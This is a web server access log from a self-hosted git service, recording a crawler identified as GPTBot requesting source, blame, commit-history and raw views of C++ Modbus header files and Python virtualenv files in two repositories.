"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:48:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:48:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 12945] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:48:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11823] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:48:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 12847] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:48:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11169] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:48:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 12759] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:48:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 12015] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:48:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 12015] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:48:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include" [Client 74.7.227.38] [Length 10312] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12/greenlet" -[17/Feb/2026:15:48:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site" [Client 74.7.227.38] [Length 9955] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12/greenlet" -[17/Feb/2026:15:48:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 15767] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12/greenlet" -[17/Feb/2026:15:48:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12" [Client 74.7.227.38] [Length 9967] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12/greenlet" -[17/Feb/2026:15:48:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 12632] [Gzip 6.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" -[17/Feb/2026:15:48:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" -[17/Feb/2026:15:48:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 10237] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:15:48:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:48:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 10436] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:15:48:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 10245] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:15:48:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10082] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:48:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include" [Client 74.7.227.38] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include" -[17/Feb/2026:15:48:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site" [Client 74.7.227.38] [Length 9924] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site" -[17/Feb/2026:15:48:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 9967] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:15:48:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 17256] [Gzip 9.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:15:48:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 4755] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:15:48:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11315] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:15:48:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 1611] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:15:48:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 1182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:15:48:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11522] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:15:48:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 558] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:15:48:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 13641] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:15:48:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 2115] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" -[17/Feb/2026:15:48:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 12758] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:48:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:15:48:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 12847] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:48:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11170] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:48:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11170] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:48:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11314] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:15:48:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 12361] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:48:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 13131] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:48:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 11430] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:48:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 9991] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:15:48:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12511] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:48:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 10434] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:15:48:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 13640] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:15:48:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 10236] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:15:48:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:48:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:48:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10083] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:48:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 